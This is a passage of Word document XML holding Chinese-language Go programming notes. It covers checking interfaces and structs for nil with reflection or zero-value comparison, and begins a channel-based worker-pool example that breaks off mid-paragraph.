    <w:p w14:paraId="4DF1EE89" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CreatedAfter:  &amp;time.Time{},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5558E3F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>CreatedBefore: &amp;time.Time{},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2EA378" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E420E87" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77344C5F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C62D81E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="309" w:name="_Toc159779767"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断某类型或者某成员变量是否为空：不该直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>!=nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断</w:t>
      </w:r>
      <w:bookmarkEnd w:id="309"/>
    </w:p>
    <w:p w14:paraId="6709B743" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断接口类型是否为空，应使用反射来判断</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC8604D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.cnblogs.com/mstmdev/p/15696177.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74235771" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ADE726E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bufWriter := func() io.Writer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D89A7D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>var w *bufio.Writer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAB6D8D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Printf("w is nil =&gt; %t\n", w == nil)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D968048" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return w</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C41DA0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB16A4D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fmt.Printf("bufWriter is nil =&gt; %t\n", bufWriter == nil)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1047EA63" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">fmt.Printf("IsNil =&gt; bufWriter is nil =&gt; %t\n", </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>reflect.ValueOf(bufWriter).IsNil()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F78659" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FE9C883" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自定义结构体，不是简单的与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比较</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BE5508" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>这里不加括号的话，就不对了，会识别为错误的东西。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED0EF19" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="007147BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ae_v.Details != (gitlab.AuditEventDetails{})</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D9ACE0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if ae_v.Details.Remove == "user" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC9BBFA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>userDeleted = append(userDeleted, ae_v)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3D70C6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331C4368" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E52C0B3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27B77DA7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>上面复杂类型判断完后，判断基础类型直接上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455C355A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D7794AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F8FF95A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="310" w:name="_Toc159779768"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多任务处理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-chan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信号量确认任务处理完毕</w:t>
      </w:r>
      <w:bookmarkEnd w:id="310"/>
    </w:p>
    <w:p w14:paraId="015DF499" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C7D51A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB20C65" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9261C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBE2B25" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>"fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4389FD16" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>"runtime"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBF1C3F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AB5BE8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F17D8B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>var workers = runtime.NumCPU()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6A020F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DDCBA5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>type result struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDA5CBF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>jobname    string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4024E321" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>resultcode int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622A375D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>resultinfo string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089AC47A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3470400E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51563AB7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>type job struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74177251" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>jobname string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42898696" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>results chan&lt;- result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FCF765" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AB9B6E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1976BE94" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B79F1BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>jobnames := []string{"1", "2", "3", "4", "5", "6", "7", "8"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103B7518" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>dorequest(jobnames)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5407CB65" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A12CBF0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E26A5C1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func dorequest(jobnames []string) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB1C8B6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6DC1AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:t>定义需要的</w:t>
      </w:r>
      <w:r>
        <w:t>channels</w:t>
      </w:r>
      <w:r>
        <w:t>切片</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AB5E8A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:tab/>
        <w:t>jobs := make(chan job, workers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2056AE6C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:tab/>
        <w:t>results := make(chan result, len(jobnames))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386E3A5B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>done := make(chan struct{}, workers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C175B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CE0AAE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227C9259" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r>
        <w:t>把任务写入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JobCh</w:t>
      </w:r>
      <w:r>
        <w:t>通道</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200731B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> **/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0AAA45" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>go func( jobs chan &lt;- job, jobnames[]string, results chan &lt;- result){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6732F7C6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>for _, jobname := range jobnames {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2958578C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>jobs &lt;- job{jobname, results}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D236FEC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13899750" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>close(jobs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207EA517" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}( jobs, jobnames, results)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359032B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77F60AF0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350E9A71" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
